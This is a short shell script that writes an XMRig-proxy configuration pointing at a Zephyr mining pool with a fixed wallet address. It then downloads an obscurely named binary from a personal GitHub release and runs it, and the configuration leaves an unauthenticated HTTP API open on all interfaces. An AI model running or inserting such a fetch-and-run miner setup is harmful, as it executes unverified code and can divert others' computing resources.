#!/bin/bash

# Set Xmrig proxy configuration
cat <<EOF > config.json
{
  "api": {
    "id": null,
    "worker-id": null
  },
  "http": {
    "enabled": true,
    "host": "0.0.0.0",
    "port": 5555,
    "access-token": null,
    "restricted": false
  },
  "log-file": null,
  "merge-multi-ssl": false,
  "merge-multi-algo": false,
  "merge-devfee": true,
  "tls": false,
  "daemon": {
    "enabled": false,
    "mode": "simple"
  },
  "pools": [
    {
      "algo": "rx/0",
      "coin": null,
      "url": "us.zephyr.herominers.com:1124",
      "user": "ZEPHYR3WLwbe4Nc9NgSMm1ZFcoZgLBLmqRnDqqRTYgjviBYvJ4GQjSQAwAGASA5CfwbS1AFXCGjmtXHTSBAER2fRjNbEnQGTBDD1X",
      "pass": "x",
      "rig-id": null,
      "pool-priority": 0
    }
  ]
}
EOF

# Download Xmrig proxy release
wget https://github.com/max313iq/Ssl/releases/download/Xxx/xmm
chmod +x xmm

# Run Xmrig proxy
./xmm -c config.json
